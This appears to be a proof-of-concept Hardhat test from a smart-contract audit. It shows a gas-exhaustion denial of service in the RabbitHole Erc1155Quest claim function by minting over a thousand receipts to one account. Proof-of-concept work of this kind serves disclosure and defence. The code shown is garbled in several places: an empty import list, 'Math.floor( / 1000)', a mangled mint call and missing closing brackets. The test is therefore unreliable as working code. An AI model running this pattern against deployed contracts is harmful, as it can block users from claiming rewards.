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Created January 30, 2023 16:49
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POC: DOS risk if enough tokens are minted in Quest.claim
import { expect } from 'chai'
import { ethers, upgrades } from 'hardhat'
import { SignerWithAddress } from '@nomiclabs/hardhat-ethers/signers'
import {
} from '../typechain-types'
describe('POC: claim DOS',()=>{
const mockAddress = '0x0000000000000000000000000000000000000000'
const questId = 'asdf'
// Modification for POC
const totalRewards = 1000
const rewardId = 1
let deployedQuestContract: Erc1155Quest
let deployedSampleErc1155Contract: SampleErc1155
let deployedRabbitholeReceiptContract: RabbitHoleReceipt
let expiryDate: number, startDate: number
let owner: SignerWithAddress
let firstAddress: SignerWithAddress
let secondAddress: SignerWithAddress
let thirdAddress: SignerWithAddress
let fourthAddress: SignerWithAddress
let questContract: Erc1155Quest__factory
let sampleERC1155Contract: SampleErc1155__factory
let rabbitholeReceiptContract: RabbitHoleReceipt__factory
const deployRabbitholeReceiptContract = async () => {
const ReceiptRenderer = await ethers.getContractFactory('ReceiptRenderer')
const deployedReceiptRenderer = await ReceiptRenderer.deploy()
await deployedReceiptRenderer.deployed()
// RabbitHoleReceipt
deployedRabbitholeReceiptContract = (await upgrades.deployProxy(rabbitholeReceiptContract, [
])) as RabbitHoleReceipt
const deploySampleErc20Contract = async () => {
// SampleErc1155
deployedSampleErc1155Contract = await sampleERC1155Contract.deploy()
await deployedSampleErc1155Contract.deployed()
const deployQuestContract = async () => {
deployedQuestContract = await questContract.deploy(
deployedSampleErc1155Contract.address, // rewardTokenAddress_
expiryDate, // endTime_
startDate, // startTime_
totalRewards, //totalParticipants_
rewardId, //rewardAmountInWeiOrTokenId_
questId, //questId_
deployedRabbitholeReceiptContract.address //receiptContractAddress_
await deployedQuestContract.deployed()
const transferRewardsToDistributor = async () => {
await deployedSampleErc1155Contract.safeTransferFrom(
owner.address, // From
deployedQuestContract.address, // to
rewardId, // ID
1000, // Amount
'0x00' //data
beforeEach(async () => {
const [local_owner, local_firstAddress, local_secondAddress, local_thirdAddress, local_fourthAddress] = await ethers.getSigners()
questContract = await ethers.getContractFactory('Erc1155Quest')
sampleERC1155Contract = await ethers.getContractFactory('SampleErc1155')
rabbitholeReceiptContract = await ethers.getContractFactory('RabbitHoleReceipt')
owner = local_owner
firstAddress = local_firstAddress
secondAddress = local_secondAddress
thirdAddress = local_thirdAddress
fourthAddress = local_fourthAddress
expiryDate = Math.floor( / 1000) + 10000
startDate = Math.floor( / 1000) + 1000
await deployRabbitholeReceiptContract()
await deploySampleErc20Contract()
await deployQuestContract()
await transferRewardsToDistributor()
it('POC: Too much rewards to claim', async () => {
// Mint 1000 ERC1155 tokens to owner
for(let i = 0; i <1100; i++){
await, questId)
// Start quest
console.log(`Participants: ${await deployedQuestContract.totalParticipants()}`)
console.log(`Owner balance: ${await deployedSampleErc1155Contract.balanceOf(owner.address, rewardId)}`)
console.log(`Quest balance: ${await deployedSampleErc1155Contract.balanceOf(deployedQuestContract.address, rewardId)}`)
await deployedQuestContract.start()
await ethers.provider.send('evm_increaseTime', [86400])
//console.log(`Owner balance: ${await deployedSampleErc1155Contract.balanceOf(owner.address, rewardId)}`)
const totalTokens = await deployedRabbitholeReceiptContract.getOwnedTokenIdsOfQuest(questId, owner.address)
//console.log(`User total receipt tokens: ${totalTokens.length}`)
await expect(deployedQuestContract.claim())"Transaction ran out of gas")
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